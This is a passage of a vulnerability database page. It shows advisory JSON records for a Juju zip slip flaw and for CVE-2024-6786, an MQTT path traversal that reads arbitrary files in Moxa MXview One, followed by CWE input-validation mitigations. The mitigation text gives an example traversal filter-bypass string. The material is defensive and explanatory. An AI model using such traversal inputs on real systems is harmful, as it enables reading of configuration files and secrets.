      "url": "https://drive.google.com/file/d/1pHRNiaA8LyMVJYwIyTqelsqJ9FmImDf0/view"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/juju/juju"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L754"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L897"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L990"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3804"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Juju zip slip vulnerability via authenticated endpoint"
}

GHSA-26Q7-27MP-G4QJ

Vulnerability from github – Published: 2024-09-21 06:30 – Updated: 2024-09-26 09:31
VLAI
Details

The vulnerability allows an attacker to craft MQTT messages that include relative path traversal sequences, enabling them to read arbitrary files on the system. This could lead to the disclosure of sensitive information, such as configuration files and JWT signing secrets.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-6786"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-24"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-21T05:15:12Z",
    "severity": "MODERATE"
  },
  "details": "The vulnerability allows an attacker to craft MQTT messages that include relative path traversal sequences, enabling them to read arbitrary files on the system. This could lead to the disclosure of sensitive information, such as configuration files and JWT signing secrets.",
  "id": "GHSA-26q7-27mp-g4qj",
  "modified": "2024-09-26T09:31:41Z",
  "published": "2024-09-21T06:30:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6786"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-268-05"
    },
    {
      "type": "WEB",
      "url": "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-240735-multiple-vulnerabilities-in-mxview-one-and-mxview-one-central-manager-series"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20
Implementation

Strategy: Input Validation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.

No CAPEC attack patterns related to this CWE.